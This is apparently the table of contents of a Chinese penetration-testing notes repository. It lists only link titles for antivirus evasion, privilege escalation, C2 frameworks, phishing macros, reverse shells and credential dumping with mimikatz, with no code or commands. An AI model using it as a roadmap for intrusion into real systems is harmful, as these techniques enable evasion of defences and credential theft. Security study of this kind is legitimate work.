- [加载器免杀](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/加载器免杀/README.md)
- [shellcode_launcher](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/加载器免杀/shellcode_launcher.md)
- [SSI加载](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/加载器免杀/SSI加载.md)
- [MSBuilt](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/MSBuilt.md)
- [MSF捆绑](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/MSF捆绑.md)
- [MSF+shellcode免杀](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/MSF+shellcode免杀/README.md)
- [c和c++源码免杀](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/MSF+shellcode免杀/c和c++源码免杀.md)
- [编码器](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/MSF+shellcode免杀/编码器.md)
- [nps_payload](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/MSF+shellcode免杀/nps_payload.md)
- [Mshta](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Mshta.md)
- [Phantom-Evasion](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Phantom-Evasion.md)
- [RC4](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/RC4.md)
- [Ruby](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Ruby.md)
- [Shellter](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Shellter.md)
- [Veil](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Veil.md)
- [zirikatu](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/zirikatu.md)
- [carboncopy](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/carboncopy.md)
- [avet](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/avet.md)
- [c代码加载图片马](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/c代码加载图片马.md)
- [Bypass AMSI](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Bypass-AMSI.md)
- [一些可尝试绕过白名单的执行](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/一些可尝试绕过白名单的执行.md)
- [在Windows Server 2016和2019中绕过WindowsDefender](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/在Windows-Server-2016和2019中绕过WindowsDefender.md)
- [cshot远程shellcode](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/cshot远程shellcode.md)
- [内存中解码shellcode绕过av](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/内存中解码shellcode绕过av.md)
- [Pezor免杀](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/Pezor免杀.md)
- [绕过安全狗脚本](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/绕过安全狗脚本.md)
- [360白名单](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/防御规避/360白名单.md)
- [权限提升](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/README.md)
- [Windows提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/README.md)
- [RDP&Firewall](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/README.md)
- [爆破RDP](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/爆破RDP.md)
- [注册表开启](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/注册表开启.md)
- [防火墙](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/防火墙.md)
- [注入点开启](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/注入点开启.md)
- [MSF开启](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/MSF开启.md)
- [wmic开启](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/wmic开启.md)
- [多用户登陆](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/多用户登陆.md)
- [RDP连接记录](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/RDP连接记录.md)
- [删除痕迹](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RDP&Firewall/删除痕迹.md)
- [impactet工具包](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/impactet工具包.md)
- [Windows-exploit-suggester](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/Windows-exploit-suggester.md)
- [Wesng](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/Wesng.md)
- [Searchsploit](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/Searchsploit.md)
- [激活guest](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/激活guest.md)
- [MYSQLudf](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/MYSQLudf.md)
- [MSSQL](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/MSSQL.md)
- [MSF](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/MSF.md)
- [BypassUAC](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/BypassUAC.md)
- [Whitelist白名单](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/Whitelist白名单.md)
- [Powerup-AlwaysInstallElevated](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/Powerup-AlwaysInstallElevated.md)
- [AlwaysInstallElevated提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/AlwaysInstallElevated提权.md)
- [密码窃取](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/密码窃取.md)
- [RottenPotato](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RottenPotato.md)
- [PowerUp](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/PowerUp.md)
- [Runas](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/Runas.md)
- [令牌窃取](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/令牌窃取.md)
- [未引用的服务路径](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/未引用的服务路径.md)
- [Vulnerable-Services](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/Vulnerable-Services.md)
- [DNS组到DomainAdmin](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/DNS组到DomainAdmin.md)
- [HiveNightmare](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/HiveNightmare.md)
- [PrintNightmare](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/PrintNightmare.md)
- [SamAccountSpoofing](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/SamAccountSpoofing.md)
- [SeBackupPrivilege](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/SeBackupPrivilege.md)
- [SeImpersonatePrivilege](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/SeImpersonatePrivilege.md)
- [SpoolFool](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/SpoolFool.md)
- [弱注册表权限](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/弱注册表权限.md)
- [CVE-2020-1472](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/CVE-2020-1472.md)
- [AppLocker](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/AppLocker.md)
- [DLL劫持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/DLL劫持.md)
- [EFSPotato](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/EFSPotato.md)
- [JuicyPotato](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/JuicyPotato.md)
- [RoguePotato](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/RoguePotato.md)
- [watson](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/watson.md)
- [WSL子系统](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/WSL子系统.md)
- [本机文件和脚本](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/本机文件和脚本.md)
- [不安全的GUI应用程序](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/不安全的GUI应用程序.md)
- [从administrator到system](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/从administrator到system.md)
- [打印机漏洞](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/打印机漏洞.md)
- [服务中的不正确权限](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/服务中的不正确权限.md)
- [环境变量优先](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/环境变量优先.md)
- [恢复服务帐户的权限](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/恢复服务帐户的权限.md)
- [弱权限的PATH目录](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/弱权限的PATH目录.md)
- [特权文件写入](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/特权文件写入.md)
- [未引用的服务路径](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Windows提权/未引用的服务路径.md)
- [Linux提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/README.md)
- [查找辅助信息](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/查找辅助信息.md)
- [查找可能泄露的密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/查找可能泄露的密码.md)
- [Linux-Exploit-Suggester](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux-Exploit-Suggester.md)
- [一些检测工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/一些检测工具.md)
- [Linux计划任务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux计划任务.md)
- [可写文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/可写文件提权.md)
- [Sudo提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Sudo提权.md)
- [Linux SUID提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/LinuxSUID提权.md)
- [漏洞提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/漏洞提权.md)
- [MYSQL-Linux-Root](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/MYSQL-Linux-Root.md)
- [LD_Preload提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/LD_Preload.md)
- [Lxd提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Lxd提权.md)
- [MYSQL漏洞](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/MYSQL漏洞.md)
- [环境变量提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/环境变量提权.md)
- [通配符提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/通配符提权.md)
- [文件操作](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/README.md)
- [创建](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/创建.md)
- [Windows查找文件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/Windows查找文件.md)
- [Linux查找文件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/Linux查找文件.md)
- [解压](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/解压.md)
- [远程解压文件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/远程解压文件.md)
- [压缩](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/压缩.md)
- [查找可写目录](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/查找可写目录.md)
- [传输](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/传输/README.md)
- [Bitsadmin](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/传输/bitsadmin.md)
- [Certutil](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/传输/certutil.md)
- [Curl](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/传输/curl.md)
- [Ftp](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/传输/ftp.md)
- [JS](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/传输/js.md)
- [nc](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/传输/nc.md)
- [perl](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/传输/perl.md)
- [php](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/传输/php.md)
- [powershell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/传输/powershell.md)
- [py](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/传输/py.md)
- [SCP](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/传输/scp.md)
- [vbs](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/传输/vbs.md)
- [wget](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/传输/wget.md)
- [WindowsDefender](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/文件操作/传输/WindowsDefender.md)
- [内网和域](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/README.md)
- [信息搜集](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/信息搜集/README.md)
- [Windows安全标识符SID](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/信息搜集/Windows安全标识符SID.md)
- [Powershell基础操作](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/信息搜集/Powershell基础操作.md)
- [Cmd](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/信息搜集/Cmd.md)
- [Linux](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/信息搜集/Linux.md)
- [Powerview](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/信息搜集/Powerview.md)
- [BloodHoundAD](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/信息搜集/BloodHoundAD.md)
- [ADDomain](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/信息搜集/ADDomain.md)
- [临时HTTP服务架设](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/信息搜集/临时HTTP服务架设.md)
- [Wmi](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/信息搜集/Wmi.md)
- [端口映射和转发](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/端口映射和转发/README.md)
- [chisel](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/端口映射和转发/chisel.md)
- [iptables](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/端口映射和转发/iptables.md)
- [lcx](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/端口映射和转发/lcx.md)
- [msf](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/端口映射和转发/msf.md)
- [netsh](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/端口映射和转发/netsh.md)
- [ssf](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/端口映射和转发/ssf.md)
- [ssh](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/端口映射和转发/ssh.md)
- [SharpChisel](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/端口映射和转发/SharpChisel.md)
- [Ligolo](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/端口映射和转发/Ligolo.md)
- [命令与控制](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/README.md)
- [Metasploit](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Metasploit/README.md)
- [常规使用](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Metasploit/常规使用.md)
- [细节使用](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Metasploit/细节使用.md)
- [模块](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Metasploit/模块.md)
- [meterpreter](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Metasploit/meterpreter.md)
- [与cs和empire交互](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Metasploit/与cs和empire交互.md)
- [CobaltStrike](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/README.md)
- [安装](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/安装.md)
- [部署](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/部署.md)
- [模块](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/模块.md)
- [连接](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/连接.md)
- [监听](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/监听.md)
- [攻击模块](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/攻击模块.md)
- [视图模块](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/视图模块.md)
- [交互](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/交互.md)
- [Beacon](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/Beacon.md)
- [克隆](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/克隆.md)
- [office宏](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/office宏.md)
- [钓鱼邮件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/钓鱼邮件.md)
- [加载脚本](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/加载脚本.md)
- [浏览器劫持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/浏览器劫持.md)
- [权限维持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/权限维持.md)
- [横向移动](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/横向移动.md)
- [隔离网络](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/隔离网络.md)
- [代理](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/代理.md)
- [Malleable C2](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令&控制/CobaltStrike/Malleable-C2.md)
- [部署VPN](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/部署VPN.md)
- [与msf和empire交互](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/与msf和empire交互.md)
- [上线提醒](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike/上线提醒.md)
- [Empire](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Empire/README.md)
- [安装](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Empire/安装.md)
- [监听](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Empire/监听.md)
- [生成](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Empire/生成.md)
- [后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Empire/后门.md)
- [连接靶机及其他操作](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Empire/连接靶机及其他操作.md)
- [权限提升](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Empire/权限提升.md)
- [横向移动](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Empire/横向移动.md)
- [模块](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Empire/模块.md)
- [与cs和msf交互](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Empire/与cs和msf交互.md)
- [Empire_Word](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Empire/Empire_Word.md)
- [交互式shell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/交互式shell.md)
- [crackmap](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/crackmap.md)
- [CobaltStrike](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/CobaltStrike.md)
- [dnscat](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/dnscat.md)
- [DNS-TXT-Command](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/DNS-TXT-Command.md)
- [Empire](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Empire.md)
- [Jsrat](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Jsrat.md)
- [koadic](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/koadic.md)
- [MSF](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/MSF.md)
- [Openssl](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Openssl.md)
- [Powershell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Powershell.md)
- [反弹shell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/反弹shell.md)
- [SILENTTRINITY](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/SILENTTRINITY.md)
- [telegram](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/telegram.md)
- [browser](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/browser.md)
- [Gmail](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Gmail.md)
- [Dropbox](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/Dropbox.md)
- [工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/工具.md)
- [下载并执行](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/内网和域/命令与控制/下载并执行.md)
- [HASH操作](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/README.md)
- [密码破解网站](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/密码破解网站.md)
- [GoogleColab破解HASH操作](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/GoogleColab破解HASH操作.md)
- [密码策略](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/密码策略.md)
- [开启Wdigest](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/开启Wdigest.md)
- [Getpass](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/Getpass.md)
- [QuarksPwDump](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/QuarksPwDump.md)
- [MSF](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/MSF.md)
- [mimikatz](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/mimikatz/README.md)
- [绕过卡巴斯基](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/mimikatz/绕过卡巴斯基.md)
- [Cisco_Jabber转储lsass](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/mimikatz/Cisco_Jabber转储lsass.md)
- [dotnet2.0](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/mimikatz/dotnet2.0.md)
- [dotnet4.0Msbuild](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/mimikatz/dotnet4.0Msbuild.md)
- [Dumpert](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/mimikatz/Dumpert.md)
- [JScript](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/mimikatz/JScript.md)
- [mimikatz](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/mimikatz/mimikatz.md)
- [mimipenguin](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/mimikatz/mimipenguin.md)
- [横向批量抓HASH操作](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/mimikatz/横向批量抓HASH操作.md)
- [远程LSASS进程转储-Physmem2profit](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/mimikatz/远程LSASS进程转储-Physmem2profit.md)
- [Powershell_Bypass](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/mimikatz/Powershell_Bypass.md)
- [Procdump64+mimikatz](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/mimikatz/Procdump64+mimikatz.md)
- [调用mimikatz远程抓取](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/mimikatz/调用mimikatz远程抓取.md)
- [SqlDumper+mimikatz](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/mimikatz/sqldumpermimikatz.md)
- [域HASH提取](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/域HASH提取/README.md)
- [impacket工具包](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/域HASH提取/impacket工具包.md)
- [mimikatz](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/域HASH提取/mimikatz.md)
- [MSF](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/域HASH提取/MSF.md)
- [Nishang脚本](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/域HASH提取/Nishang脚本.md)
- [NTDSDumpex](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/域HASH提取/NTDSDumpex.md)
- [Ntdsutil](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/域HASH提取/Ntdsutil.md)
- [Powersploit](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/域HASH提取/Powersploit.md)
- [Vssadmin](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/域HASH提取/Vssadmin.md)
- [Wmivssadmin](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/域HASH提取/Wmivssadmin.md)
- [esentutl](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/域HASH提取/esentutl.md)
- [缓存HASH获取](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/缓存HASH获取/README.md)
- [Ninjacopy](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/HASH操作/缓存HASH获取/Ninjacopy.md)
